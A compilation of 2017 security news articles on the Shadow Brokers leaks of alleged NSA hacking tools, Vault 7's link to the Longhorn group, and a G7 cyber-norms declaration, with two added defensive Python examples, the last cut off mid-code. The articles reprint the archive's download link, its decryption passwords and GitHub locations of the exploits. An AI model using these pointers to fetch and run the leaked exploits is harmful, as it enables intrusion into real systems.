The files, according to computer security analysts, also showed the NSA had found and exploited numerous vulnerabilities in a range of Microsoft Windows products widely used on computers around the world.

Analysts generally accepted the files, which show someone exploiting so-called "zero-day" or hitherto unknown vulnerabilities in common software and hardware, came from the NSA.

They are believed to have been stolen from a hyper-secret hacking unit dubbed the "Equation Group" at the key US signals intelligence agency.

"The tools and exploits released today have been specifically designed to target earlier versions of Windows operating system," said security specialist Pierluigi Paganini on the Security Affairs website.

They "suggest the NSA was targeting the SWIFT banking system of several banks around the world."

The files appear to indicate that the NSA had infiltrated two of SWIFT's service bureaus, including EastNets, which provides technology services in the Middle East for the Belgium-based SWIFT and for individual financial institutions.

Via that entry point the agency appears to have monitored transactions involving several banks and financial institutions in Kuwait, Dubai, Bahrain, Jordan, Yemen and Qatar.

In a statement on its website EastNets rejected the allegations.

"The reports of an alleged hacker-compromised EastNets Service Bureau network is totally false and unfounded," it said.

"We can confirm that no EastNets customer data has been compromised in any way."

SWIFT said in a statement that the allegations involve only its service bureaus and not its own network.

"There is no impact on SWIFT's infrastructure or data, however we understand that communications between these service bureaus and their customers may previously have been accessed by unauthorized third parties."

"We have no evidence to suggest that there has ever been any unauthorized access to our network or messaging services."

Shadow Brokers first surfaced last year offering for sale a suite of hacking tools from the NSA. There were no takers at the price stated of tens of millions of dollars, and since then the hacker or hackers have leaked bits of the trove for free.

Analysts say many of the exploits revealed appear to be three years old or more, but have some unknown vulnerabilities that could still be used by other hackers.

No one has yet discovered the identity of Shadow Brokers, or of the hackers that gained access to the NSA materials.


Shadow Brokers released another archive that suggests NSA compromised a SWIFT system
15.4.2017 securityaffairs BigBrothers

The Shadow Brokers group released a 117.9 MB encrypted dump containing documents that suggest the NSA hacked a SWIFT service bureau in the Middle East.
Last week, the notorious Shadow Brokers hacker group, which claims to have stolen hacking tools and exploits from the NSA, leaked the password for an encrypted cache of Unix hacking tools and exploits, including a remote root zero-day exploit for Solaris and the TOAST framework.
Today the Shadow Brokers released another piece of the precious archive allegedly stolen from the NSA: a 117.9 MB encrypted dump with three folders named Windows, Swift, and OddJob, containing 23 new hacking tools.

Some of the codenames for the hacking tools in the archive are OddJob, EasyBee, EternalRomance, FuzzBunch, EducatedScholar, EskimoRoll, EclipsedWing, EsteemAudit, EnglishMansDentist, MofConfig, ErraticGopher, EmphasisMine, EmeraldThread, EternalSynergy, EwokFrenzy, ZippyBeer, ExplodingCan, DoublePulsar.

The tools and exploits released today have been specifically designed to target earlier versions of the Windows operating system, and this latest batch of documents suggests the NSA was targeting the SWIFT banking system of several banks around the world.

The hackers published a blog post titled “Lost in Translation,” which included a link to the archive and the password.

“Follow the links for new dumps. Windows. Swift. Oddjob. Oh you thought that was it? Some of you peoples is needing reading comprehension.

https://yadi.sk/d/NJqzpqo_3GxZA4
Password = Reeeeeeeeeeeeeee
” reads the blog post.

The full archive, including this latest portion, is now available on GitHub.
Of course, security researchers immediately started digging the precious trove of files.

x0rz (@x0rz), 11:44 AM - 14 Apr 2017:
“Windows exploits, payloads and implants of #EquationGroup dumped by the #ShadowBrokers: confirmed.”

Hacker Fantastic (@hackerfantastic), 3:04 PM - 14 Apr 2017:
“EMERALDTHREAD is an exploit (unpatched?) for Windows XP to Windows 2003 SP2.”
The hacking tools in the Windows folder work against older versions of Windows (Windows XP and Server 2003).

The OddJob folder contains a Windows implant together with alleged configuration files and payloads; in this case too, the targeted versions are older ones, from Windows XP Professional up to Windows Server 2003 Enterprise.

According to security expert Kevin Beaumont, who analyzed the dump, some of the Windows exploits had never been seen before by antivirus vendors.
Kevin Beaumont (@GossiTheDog), 12:45 - 14 Apr 2017:
“So far the first 3 exploits in Windows/Exploits haven't been on VirusTotal before, nor in Palo-Alto Autofocus.”
But the SWIFT folder contains a PowerPoint document that could reveal a disconcerting reality. The presentation contains credentials and data on the internal architecture of EastNets, one of the largest SWIFT Service Bureaus in the Middle East.

The folder includes SQL scripts that could be used to query an Oracle database for a wide range of information, including the list of users and the SWIFT message queries.

The folder also contains Excel files that suggest the NSA-linked Equation Group had hacked many banks, most of them in the Middle East (e.g. UAE, Kuwait, Qatar, Palestine, and Yemen).

Matt Suiche (@msuiche), 17:48 - 14 Apr 2017:
“SWIFT Host of Palestinian Bank was running Windows 2008 R2 vulnerable to exploit framework FUZZBUNCH. #ShadowBrokers cc @hackerfantastic”
But EastNets’ CEO has denied that NSA hackers ever compromised the company's systems.
“The reports of an alleged hacker-compromised EastNets Service Bureau (ENSB) network is totally false and unfounded,” EastNets’ CEO Hazem Mulhim told Motherboard in an email. “The EastNets Network internal Security Unit has run a complete check of its servers and found no hacker compromise or any vulnerabilities.” reads the official statement issued by the company.
“The EastNets Service Bureau runs on a separate secure network that cannot be accessed over the public networks. The photos shown on twitter, claiming compromised information, is about pages that are outdated and obsolete, generated on a low-level internal server that is retired since 2013.”

“While we cannot ascertain the information that has been published, we can confirm that no EastNets customer data has been compromised in any way”


Watch out! Shadow Brokers dump includes remote root exploits for Solaris boxes
12.4.2017 securityaffairs BigBrothers

The security expert Matthew Hickey has discovered two tools dubbed EXTREMEPARR and EBBISLAND which were specifically designed to target Solaris systems.
After the mysterious Shadow Brokers group leaked the archive containing the stolen NSA hacking tools and exploits, security experts started analyzing the huge trove of data and discovered that NSA operators had developed attack code to compromise Oracle’s Solaris.

The cyber security expert Matthew Hickey, co-founder of British security shop Hacker House, found two tools dubbed EXTREMEPARR and EBBISLAND while digging through the archive; both were specifically designed to target Solaris systems.


Hacker Fantastic (@hackerfantastic), 9:31 PM - 10 Apr 2017:
“EXTREMEPARR - 0day local privilege escalation attack working on Solaris 7,8,9,10 x86 & SPARC (confirmed & tested, platforms & versions.)”

Hacker Fantastic (@hackerfantastic), 12:00 AM - 11 Apr 2017:
“CONFIRMED #0day EBBISLAND (EBBSHAVE) is a root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 & 10 (possibly newer) both SPARC and x86. pwn”
Between them, the two tools let an attacker escalate a logged-in user to root (EXTREMEPARR) and obtain root access remotely over the network (EBBISLAND). They work on Solaris versions 6 to 10 on x86 and SPARC, and experts believe they could also work on the latest build, version 11.

The EXTREMEPARR tool elevates the logged-in entity (e.g. a user or a script) to root by abusing dtappgather, file permissions, and the setuid binary at.

The EBBISLAND tool can be aimed at any open RPC service to spawn a remote root shell on the flawed Solaris box; it triggers a buffer overflow vulnerability in Solaris’s XDR code.


In summary, the NSA could open a root shell on any Solaris system, and the experts noted that using the exploits requires no particular skill.

“These are prebuilt static binaries and you can run them out of the box with very little technical knowledge,” Hickey told The Register.

Hacker Fantastic (@hackerfantastic), 12:23 AM - 11 Apr 2017:
“The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.”
Hickey scanned the Internet for vulnerable connected devices using the popular Shodan.io search engine and found thousands of vulnerable systems. The real threat, he said, is that many more of these machines run internally behind firewalls, where the exploit code could be used to root them and move laterally once an attacker gains a foothold within an organization.


G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE
12.4.2017 securityaffairs BigBrothers

Presented the voluntary, non-binding norms of State behavior during peacetime in the G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE.
The risk of escalation and retaliation in cyberspace, together with the growing number and sophistication of cyber attacks and threats, could have a destabilizing effect on international peace and security. The risk of conflict between states caused by cyber incidents encourages all States to engage in law-abiding, norm-respecting and confidence-building behavior in their use of ICT.

G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE

I’m very proud to share with you the G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE; I had the honor to be a member of the group that worked on the proposal for voluntary, non-binding norms of State behavior during peacetime. We presented 12 points aimed at proposing stability and security in cyberspace. The declaration invites all States to collaborate with the intent of reducing risks to international peace, security, and stability.

Below are the points presented in the Declaration:

Consistent with the purposes of the United Nations, including to maintain international peace and security, States should cooperate in developing and applying measures to increase stability and security in the use of ICTs and to prevent ICT practices that are acknowledged to be harmful or that may pose threats to international peace and security;
In case of ICT incidents, States should consider all relevant information, including the larger context of the event, the challenges of attribution in the ICT environment and the nature and extent of the consequences;
States should not knowingly allow their territory to be used for internationally wrongful acts using ICTs;
States should consider how best to cooperate to exchange information, assist each other, prosecute terrorist and criminal use of ICTs and implement other cooperative measures to address such threats. States may need to consider whether new measures need to be developed in this respect;
States, in ensuring the secure use of ICTs, should respect Human Rights Council resolutions 20/8 and 26/13 on the promotion, protection and enjoyment of human rights on the Internet, as well as General Assembly resolutions 68/167 and 69/166 on the right to privacy in the digital age, to guarantee full respect for human rights, including the right to freedom of expression;
A State should not conduct or knowingly support ICT activity contrary to its obligations under international law that intentionally damages critical infrastructure or otherwise impairs the use and operation of critical infrastructure to provide services to the public;
States should take appropriate measures to protect their critical infrastructure from ICT threats, taking into account General Assembly resolution 58/199 on the creation of a global culture of cybersecurity and the protection of critical information infrastructures, and other relevant resolutions;
States should respond to appropriate requests for assistance by another State whose critical infrastructure is subject to malicious ICT acts. States should also respond to appropriate requests to mitigate malicious ICT activity aimed at the critical infrastructure of another State emanating from their territory, taking into account due regard for sovereignty;
States should take reasonable steps to ensure the integrity of the supply chain so that end users can have confidence in the security of ICT products. States should seek to prevent the proliferation of malicious ICT tools and techniques and the use of harmful hidden functions;
States should encourage responsible reporting of ICT vulnerabilities and share associated information on available remedies to such vulnerabilities to limit and possibly eliminate potential threats to ICTs and ICT-dependent infrastructure;
States should not conduct or knowingly support activity to harm the information systems of the authorized emergency response teams (sometimes known as computer emergency response teams or cybersecurity incident response teams) of another State. A State should not use authorized emergency response teams to engage in malicious international activity.
No country should conduct or support ICT-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors.
Let me thank my colleagues Luigi Martino and Marco Lapadura, who worked with me on the declaration, and of course Minister Gianfranco Incarnato, who led the working group.


WikiLeaks CIA Files Linked to Espionage Group

11.4.2017 securityweek  BigBrothers

Researchers at Symantec have analyzed the Vault 7 files published in recent weeks by WikiLeaks and determined that they are very similar to ones used by a cyberespionage group tracked by the security firm as “Longhorn.”

The Vault 7 leaks cover exploits and tools allegedly used by the U.S. Central Intelligence Agency (CIA) to hack a wide range of systems, including PCs, Macs, mobile devices and IoT products. Based on an analysis of the files, Symantec is fairly confident that some of the Vault 7 documents describe the tools and techniques used by Longhorn.

According to the security firm, Longhorn is a threat group that has been around since at least 2011, but possibly as early as 2007. Symantec has been tracking the APT since 2014, when it used a Windows zero-day exploit (CVE-2014-4148) to deliver a backdoor called Plexor.

Researchers have observed Longhorn attacks aimed at more than 40 targets across 16 different countries in Europe, Asia (Middle East and other regions) and Africa. The list of targets includes governments, international organizations, and companies in the telecoms, financial, aerospace, energy, IT, education, and natural resources sectors. Symantec pointed out that all of the targeted entities could present an interest to a nation-state actor.

An analysis of Longhorn’s tools and working hours suggests that the group is located in North America and its members are English speakers.

The CIA has neither confirmed nor denied that the Vault 7 files are authentic. The agency said its mission is to collect foreign intelligence from overseas entities, and pointed out that it is legally prohibited from spying on Americans.

Symantec noted that it did detect one Longhorn malware infection in the United States, but an uninstaller was launched within hours, which could indicate that the computer had been infected unintentionally.

In addition to Plexor, Longhorn has used several other pieces of malware in its operations, including Trojans dubbed Corentry, LH1 and LH2.

Corentry’s development timeline coincides with the dates mentioned in a changelog file published by WikiLeaks for a tool called Fluxwire. Experts also determined that the Plexor backdoor is very similar to a tool named in the Vault 7 documents “Fire and Forget.”

Researchers also found similarities between the cryptographic protocols described in the Vault 7 files and the ones used by Longhorn.

“Other Vault 7 documents outline tradecraft practices to be used, such as use of the Real-time Transport Protocol (RTP) as a means of command and control (C&C) communications, employing wipe-on-use as standard practice, in-memory string de-obfuscation, using a unique deployment-time key for string obfuscation, and the use of secure erase protocols involving renaming and overwriting. Symantec has observed Longhorn tools following all of these practices,” the security firm said in a blog post.

If confirmed, Longhorn would be the second cyber espionage group whose activities have been tied to the U.S. government. The first was the NSA-linked Equation Group, whose mistakes were analyzed by the individuals who developed the Vault 7 tools.


Symantec confirms that Longhorn group is tied to CIA operators detailed in Vault 7
11.4.2017 securityaffairs BigBrothers

Symantec reportedly linked the CIA hacking tools to several cyber attacks carried out over the years by the Longhorn group.
Security experts who analyzed the alleged CIA hacking tools included in the Vault 7 dump found that they have been used against at least 40 governments and private organizations across 16 countries.
Researchers at security firm Symantec reportedly linked the CIA hacking tools to a number of cyber attacks launched in recent years by a threat actor the company identified as the Longhorn group.

“Spying tools and operational protocols detailed in the recent Vault 7 leak have been used in cyberattacks against at least 40 targets in 16 different countries by a group Symantec calls Longhorn. Symantec has been protecting its customers from Longhorn’s tools for the past three years and has continued to track the group in order to learn more about its tools, tactics, and procedures.” reads the analysis published by Symantec.

“The tools used by Longhorn closely follow development timelines and technical specifications laid out in documents disclosed by WikiLeaks.”

Symantec believes Longhorn is a North American hacking group that has been active since at least 2011. The group is very sophisticated and has used zero-day exploits and complex malware to conduct targeted attacks against governments and organizations in almost every industry, including financial, energy, telecommunications, education, and aerospace.

The Longhorn group is a well-resourced hacking team that operated on a standard Monday to Friday working week in an American time zone. The nature of the targets and its Tactics, Techniques, and Procedures (TTPs) suggest the Longhorn group is a state-sponsored crew.

The targets were all located in the Middle East, Europe, Asia, and Africa. In one case, the researchers observed the Longhorn group compromising a computer in the US; following the infection, an uninstaller was quickly executed, which demonstrates that this victim was infected unintentionally.

“The Longhorn group shares some of the same cryptographic protocols specified in the Vault 7 documents, in addition to following leaked guidelines on tactics to avoid detection. Given the close similarities between the tools and techniques, there can be little doubt that Longhorn’s activities and the Vault 7 documents are the work of the same group.” continues Symantec.

Digging into the precious Vault 7 archive, the experts discovered documents on the Fluxwire cyber espionage malware. The documents include a changelog of dates for when new features were added to the malicious code; the features and the timeline are consistent with the development cycle of the Corentry malware created by the Longhorn APT.
“These dates align closely with the development of one Longhorn tool (Trojan.Corentry) tracked by Symantec. New features in Corentry consistently appeared in samples obtained by Symantec either on the same date listed in the Vault 7 document or several days later, leaving little doubt that Corentry is the malware described in the leaked document.” reads Symantec.

“Early versions of Corentry seen by Symantec contained a reference to the file path for the Fluxwire program database (PDB) file. The Vault 7 document lists removal of the full path for the PDB as one of the changes implemented in Version 3.5.0.”


“Up until 2014, versions of Corentry were compiled using GCC [GNU Compiler Collection]. According to the Vault 7 document, Fluxwire switched to an MSVC compiler for version 3.3.0 on February 25, 2015. This was reflected in samples of Corentry, where a version compiled on February 25, 2015, had used MSVC as a compiler.”

A second document in the Vault 7 archive details Fire and Forget, a specification for user-mode injection of a payload by a tool called Archangel.

The specification of the malicious code and the interface used to load it matches the Longhorn tool called Backdoor.Plexor.

The experts discovered many other similarities; another leaked CIA document outlined cryptographic protocols that should be implemented in malware development.
“A third document outlines cryptographic protocols that malware tools should follow. These include the use of inner cryptography within SSL to prevent man-in-the-middle (MITM) attacks, key exchange once per connection, and use of AES with a 32-bit key. These requirements align with the cryptographic practices observed by Symantec in all of the Longhorn tools.” continues Symantec.

Another Vault 7 document recommends using in-memory string de-obfuscation and the Real-time Transport Protocol (RTP) for communicating with the command and control (C&C) servers.

All the above techniques and protocols were implemented in all the hacking tools of the Longhorn group.

Researchers from Symantec discovered a number of indicators that confirm Longhorn was from an English-speaking, North American country.

“The acronym MTWRFSU (Monday Tuesday Wednesday ThuRsday Friday Saturday SUnday) was used to configure which day of the week malware would communicate with the attackers. This acronym is common in academic calendars in North America.” reads Symantec. “Some of the code words found in the malware, such as SCOOBYSNACK, would be most familiar in North America. In addition to this, the compilation times of tools with reliable timestamps indicate a time zone in the Americas.”
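The MTWRFSU schedule string quoted above is a small configuration format an analyst has to decode when reconciling a recovered sample with network telemetry. The following is an added example, not code from Symantec or from any Longhorn tool: it decodes such a string into weekdays, recovers the schedule implied by a set of observed beacon timestamps, and lists beacons that contradict a recovered configuration. The letter-to-day mapping is the one the page quotes (R for Thursday, U for Sunday); the schedule strings and timestamps are constructed.

```python
"""Decode the MTWRFSU day-of-week schedule format reported in Longhorn
configurations and reconcile it with observed beacon times.

Added example, not code from Symantec or from the malware: the letter set
(M T W R F S U) is the one quoted on the page; schedules and timestamps
used below are constructed sample data.
"""
from datetime import datetime, timezone

# One letter per weekday in the North American academic-calendar style:
# R stands for Thursday and U for Sunday so that every day has a unique letter.
# Values are datetime.weekday() indices (Monday == 0).
DAY_LETTERS = {"M": 0, "T": 1, "W": 2, "R": 3, "F": 4, "S": 5, "U": 6}
LETTER_ORDER = "MTWRFSU"
DAY_NAMES = ["Monday", "Tuesday", "Wednesday", "Thursday",
             "Friday", "Saturday", "Sunday"]


def decode_schedule(spec):
    """Return the set of weekday indices enabled by a schedule such as 'MTWRF'.
    An unknown letter raises so that a misread config field is reported
    rather than silently dropped."""
    days = set()
    for ch in spec.strip().upper():
        if ch not in DAY_LETTERS:
            raise ValueError("unknown day letter %r in schedule %r" % (ch, spec))
        days.add(DAY_LETTERS[ch])
    return days


def schedule_names(spec):
    """Human-readable weekday names for a schedule, Monday first."""
    return [DAY_NAMES[d] for d in sorted(decode_schedule(spec))]


def encode_schedule(days):
    """Inverse of decode_schedule: weekday indices -> canonical MTWRFSU string."""
    return "".join(ch for ch in LETTER_ORDER if DAY_LETTERS[ch] in days)


def infer_schedule(timestamps):
    """Smallest schedule consistent with observed beacon times (for example
    from proxy or NetFlow records).  Timestamps should first be converted to
    the time zone the operators used, since the weekday depends on it."""
    return encode_schedule({ts.weekday() for ts in timestamps})


def beacons_outside_schedule(spec, timestamps):
    """Beacons on days the configuration disables.  A non-empty result means
    the config was misread or the traffic does not belong to this implant."""
    allowed = decode_schedule(spec)
    return [ts for ts in timestamps if ts.weekday() not in allowed]


if __name__ == "__main__":
    # Constructed telemetry: beacons on Mon 3 Apr .. Sat 8 Apr 2017 (UTC).
    seen = [datetime(2017, 4, d, 9, 30, tzinfo=timezone.utc) for d in (3, 4, 5, 6, 7, 8)]
    print("MTWRF  ->", schedule_names("MTWRF"))
    print("observed schedule:", infer_schedule(seen))
    print("outside MTWRF:", beacons_outside_schedule("MTWRF", seen))
```

The weekday of a beacon depends on the time zone in which it is evaluated, so telemetry recorded in UTC should be shifted to the operators' zone (the page places Longhorn in an American time zone) before `infer_schedule` is compared with a configuration string.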

Summarizing, there is no doubt that the Longhorn group has the same abilities and hacking tools as the CIA operators documented in the Vault 7 files.


Symantec Connects 40 Cyber Attacks to CIA Hacking Tools Exposed by Wikileaks
11.4.2017 thehackernews BigBrothers
Security researchers have confirmed that the alleged CIA hacking tools recently exposed by WikiLeaks have been used against at least 40 governments and private organizations across 16 countries.
Since March, as part of its "Vault 7" series, Wikileaks has published over 8,761 documents and other confidential information that the whistleblower group claims came from the US Central Intelligence Agency (CIA).
Now, researchers at cybersecurity company Symantec reportedly managed to link those CIA hacking tools to numerous real cyber attacks in recent years that have been carried out against the government and private sectors across the world.
Those 40 cyber attacks were conducted by Longhorn — a North American hacking group that has been active since at least 2011 and has used backdoor trojans and zero-day attacks to target government, financial, energy, telecommunications, education, aerospace, and natural resources sectors.
Although the group's targets were all in the Middle East, Europe, Asia, and Africa, researchers said the group once infected a computer in the United States, but an uninstaller was launched within an hour, which indicates the "victim was infected unintentionally."
What's interesting is that Symantec linked some of CIA hacking tools and malware variants disclosed by Wikileaks in the Vault 7 files to Longhorn cyber espionage operations.
Fluxwire (Created by CIA) ≅ Corentry (Created by Longhorn)
Fluxwire, a cyber espionage malware allegedly created by the CIA and mentioned in the Vault 7 documents, contains a changelog of dates for when new features were added, which, according to Symantec, closely resembles the development cycle of "Corentry," a malware created by the Longhorn hacking group.
"Early versions of Corentry seen by Symantec contained a reference to the file path for the Fluxwire program database (PDB) file," Symantec explains. "The Vault 7 document lists removal of the full path for the PDB as one of the changes implemented in Version 3.5.0."
"Up until 2014, versions of Corentry were compiled using GCC [GNU Compiler Collection]. According to the Vault 7 document, Fluxwire switched to an MSVC compiler for version 3.3.0 on February 25, 2015. This was reflected in samples of Corentry, where a version compiled on February 25, 2015, had used MSVC as a compiler."
Similar Malware Modules
Another Vault 7 document details the 'Fire and Forget' specification of a payload and a malware module loader called Archangel, which, Symantec claims, match almost perfectly a Longhorn backdoor called Plexor.
"The specification of the payload and the interface used to load it was closely matched in another Longhorn tool called Backdoor.Plexor," says Symantec.
Use of Similar Cryptographic Protocol Practices
Another leaked CIA document outlined cryptographic protocols that should be used within malware tools, such as using AES encryption with a 32-bit key, inner cryptography within SSL to prevent man-in-the-middle attacks, and key exchanges once per connection.
One leaked CIA document also recommends using in-memory string de-obfuscation and the Real-time Transport Protocol (RTP) for communicating with the command and control (C&C) servers.
According to Symantec, these cryptographic protocol and communication practices were also used by Longhorn group in all of its hacking tools.
More About LongHorn Hacking Group
Longhorn has been described as a well-resourced hacking group that works on a standard Monday to Friday working week — likely a behavior of a state-sponsored group — and operates in an American time zone.
Longhorn's advanced malware tools are specially designed for cyber espionage with detailed system fingerprinting, discovery, and exfiltration capabilities. The group uses extremely stealthy capabilities in its malware to avoid detection.
Symantec's analysis of the group's activities also shows that Longhorn is from an English-speaking North American country, with code words used by the group referring to the band The Police (REDLIGHT and ROXANNE) and colloquial terms like "scoobysnack."
Overall, the functionality described in the CIA documents and its links to the group activities leave "little doubt that Longhorn's activities and the Vault 7 documents are the work of the same group."


Shadow Brokers Release More NSA Exploits

10.4.2017 securityweek BigBrothers
The hacker group calling itself “Shadow Brokers” has released another round of exploits and tools allegedly used by the NSA-linked threat actor “Equation Group,” along with a message to U.S. President Donald Trump.

Over the weekend, the group published the password to a previously released password-protected archive. An analysis of the files revealed the existence of various exploits and lists of organizations apparently targeted by the Equation Group.

Google Project Zero researcher Tavis Ormandy said one of the leaked exploits, dubbed EXACTCHANGE, relies on a Linux kernel vulnerability that can be exploited for local privilege escalation. Ormandy believes the Equation Group had the exploit “for years” before it was discovered by Google researchers in 2009.

An analysis conducted by Maksym Zaitsev showed that the leaked files include what appear to be Solaris exploits, a cross-platform RAT, Linux keyloggers, exploits targeting Cisco firewalls, system fingerprinting tools, an IP.Board exploit, and Apache and Samba zero-days affecting several Linux distributions.

A researcher who uses the online moniker “x0rz” also analyzed the latest dump and identified a tool that can clean logs (TOAST), a fake Chinese browser (ELECTRICSLIDE), and several GSM-related tools (CURSEHAPPY, EDITIONHAZE, LIQUIDSTEEL, SHAKENGIRAFFE, WHOLEBLUE). He also found evidence that the Equation Group had been looking for clues of attacks by other threat actors on compromised systems.

Experts also found lists of IP addresses and domain names that may belong to organizations targeted by the Equation Group, and they pointed out that victims include U.S. allies.

The Shadow Brokers had initially attempted to sell the exploits they obtained, but none of their strategies, including auctions and direct sale offers, was successful. While the group has now made available another batch of files for free, Zaitsev and others, including Edward Snowden, believe there are still some files that have not been released.

Edward Snowden ✔ @Snowden, 8:32 PM - 8 Apr 2017:
Quick review of the #ShadowBrokers leak of Top Secret NSA tools reveals it's nowhere near the full library, but there's still so... (1/2)
...much here that NSA should be able to instantly identify where this set came from and how they lost it. If they can't, it's a scandal.

In a message they posted on Medium, the Shadow Brokers told President Trump that they are disappointed by his actions.

“TheShadowBrokers voted for you,” the hackers said. “TheShadowBrokers supports you. TheShadowBrokers is losing faith in you. Mr. Trump helping theshadowbrokers, helping you. Is appearing you are abandoning ‘your base’, ‘the movement’, and the peoples who getting you elected.”

The group has once again claimed that it is not connected to Russia, but they did say that Russia and Putin are the United States’ “best allies until the common enemies are defeated and America is great again.”

However, some people have pointed out that the timing of the leak is suspicious – it comes shortly after the U.S. decided to bomb Syria, which is an ally of Russia. Some experts had previously suggested that the Shadow Brokers is actually an English-speaking group.

While many of the exploits leaked previously by Shadow Brokers turned out to rely on old vulnerabilities, some companies, including Cisco, did identify some zero-days. It remains to be seen if tech companies confirm any unpatched flaws in the latest leaks.


The Shadow Brokers release more alleged NSA hacking tools and exploits
9.4.2017 securityaffairs BigBrothers

The Shadow Brokers hacking crew sent a message to President Trump commenting on recent political events and released more alleged NSA hacking tools.
The Shadow Brokers is the mysterious group that in October 2016 claimed to have stolen a bunch of hacking tools used by the NSA for its operations.

At the end of October 2016, the hackers leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation Group compromised these targets using the hacking tools codenamed INTONATION and PITCHIMPAIR. The Shadow Brokers provided links to two distinct PGP-encrypted archives: the first one was offered for free as proof of the hack (its passphrase was ‘auctioned’), while for the second one the group requested 1 million BTC.

The first archive contained roughly 300MB of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION. The Equation Group’s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of the files are at least three years old; the newest timestamp dates to October 2013. In early October, TheShadowBrokers complained that no one seemed to be bidding on their precious archive; an alleged member of the group expressed his dissent at the lack of interest in ponying up bitcoins to release the full NSA data dump. A couple of weeks before, the group had announced the launch of a crowdfunding campaign for the stolen arsenal because its auction had received offers for less than two bitcoins.

In December 2016, the Shadow Brokers changed their sales model and put up the NSA’s hacking arsenal for direct sale on an underground website.

Back to the present, today the Shadow Brokers group released more alleged hacking tools and exploits that allegedly belong to the Equation Group.

The group has dropped the bomb: it has finally released the password for the encrypted dump of NSA files, and anyone can now access them.

The group shared the following password:

CrDj"(;Va.*NdlnzB9M?@K2)#>deB7mN

in a blog post on the Medium platform titled “Don’t Forget Your Base”.

The post is an open letter to President Donald Trump in which the group expresses its point of view on Trump’s policy; it explicitly refers to Goldman Sachs, the air strike against Syria and the removal of Steve Bannon from the National Security Council, among other things.

“Respectfully, what the fuck are you doing? TheShadowBrokers voted for you. TheShadowBrokers supports you. TheShadowBrokers is losing faith in you. Mr. Trump helping theshadowbrokers, helping you. Is appearing you are abandoning “your base”, “the movement”, and the peoples who getting you elected.” reads the post.

A security expert who goes by the Twitter handle x0rz has uploaded all the files, after decryption, to GitHub.


A close look at the archive revealed the existence of numerous tools that were developed to target specific platforms, including:

rpc.cmsd, a remote root zero-day exploit for the Solaris Unix-based operating system.

x0rz @x0rz, 3:42 PM - 8 Apr 2017:
Solaris rpc.cmsd remote root exploit (TAO's EASYSTREET) #0day
The NSA's access inside the GSM network of Pakistan’s mobile operator Mobilink.

x0rz @x0rz, 5:41 PM - 8 Apr 2017:
NSA operators notes about their access inside 🇵🇰Pakistan Mobilink GSM network https://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/doc/old/etc/user.mission.sicklestar.COMMON … #ShadowBrokers #EquationGroup #APT
The NSA Tailored Access Operations team (TAO) used the TOAST framework to clean logs of Unix wtmp events.

x0rz @x0rz, 4:50 PM - 8 Apr 2017:
TAO's TOAST framework used to clean Unix wtmp events, no logs no crime 😏 #opsec
The Equation Group used the ElectricSlide tool to impersonate a Chinese browser with fake Accept-Language.


x0rz @x0rz, 5:53 PM - 8 Apr 2017:
One of the #EquationGroup tool (ELECTRICSLIDE) impersonates a Chinese browser with fake Accept-Language https://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/bin/electricslide.pl …
If you want, the group is still accepting donations; below is its Bitcoin wallet: 19BY2XCgbDe6WtTVbTyzM9eR3LYr6VitWK

which has received a total of 10.41198465 bitcoins.


Shadow Brokers Group Releases More Stolen NSA Hacking Tools & Exploits
8.4.2017 thehackernews BigBrothers
Remember The Shadow Brokers? They are back.
A hackers group that previously claimed to have stolen a bunch of hacking tools (malware, zero-day exploits, and implants) created by the NSA and gained popularity last year for leaking a portion of those tools is back.
Today, The Shadow Brokers group released more alleged hacking tools and exploits that, the group claims, belonged to "Equation Group" – an elite cyber attack unit linked to the NSA.
Besides dumping some NSA's hacking tools back in August 2016, the Shadow Brokers also released an encrypted cache of files containing more NSA's hacking tools and exploits in an auction, asking for 1 Million Bitcoins (around $568 Million).
However, after the failed auction, the group put up those hacking tools and exploits for direct sale on an underground website, categorizing them by type — like "exploits," "Trojans," and "implants" — each of which ranged from 1 to 100 Bitcoins (from $780 to $78,000).
Now, the Shadow Brokers have finally released the password for the encrypted cache of NSA files, allowing anyone to unlock and download the auction data dump.
CrDj"(;Va.*NdlnzB9M?@K2)#>deB7mN
The password mentioned above for the encrypted NSA files was made public through a blog post published today.
The blog post, titled "Don't Forget Your Base," has been written as an open letter to President Donald Trump, containing political views expressed by the Shadow Brokers on Trump's recent policies and events, like Goldman Sachs, the air strike against Syria and the removal of Steve Bannon from the National Security Council, among others.
A security researcher, who uses Twitter handle x0rz, has uploaded all files after decryption on Github and confirmed that the archive includes:
rpc.cmsd, a remote root zero-day exploit for Solaris, the Oracle-owned Unix-based operating system.
The TOAST framework that NSA's TAO (Tailored Access Operations) team used to clean logs of Unix wtmp events.
The Equation Group's ElectricSlide tool that impersonates a Chinese browser with fake Accept-Language.
Evidence of the NSA operators' access inside the GSM network of Mobilink, one of Pakistan's popular mobile operator companies.
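Both Shadow Brokers write-ups above mention TOAST being used to clean Unix wtmp events, which is the defender's cue to treat wtmp as a file that can be edited rather than a trusted record. The following is an added example, not TOAST and not code from the leaked archive: it parses wtmp records, applies three heuristics for in-place editing (zero-filled records, timestamps that go backwards, logouts whose login record is gone) and reconciles the file against an independently written source, here sshd "Accepted" lines. It assumes the 64-bit Linux glibc `struct utmp` layout (384-byte records); the wtmp bytes and auth-log lines are constructed sample data.

```python
"""Parse Unix wtmp records and flag signs of log cleaning.

Added example for the TOAST/wtmp passages; this is not TOAST and is not from
the leaked archive.  It assumes the 64-bit Linux glibc `struct utmp` layout
(384-byte records) and runs on constructed sample records and auth-log lines.
"""
import re
import struct

# struct utmp, 64-bit Linux glibc: ut_type(h) + 2 pad, ut_pid(i), ut_line[32],
# ut_id[4], ut_user[32], ut_host[256], ut_exit (two shorts), ut_session(i),
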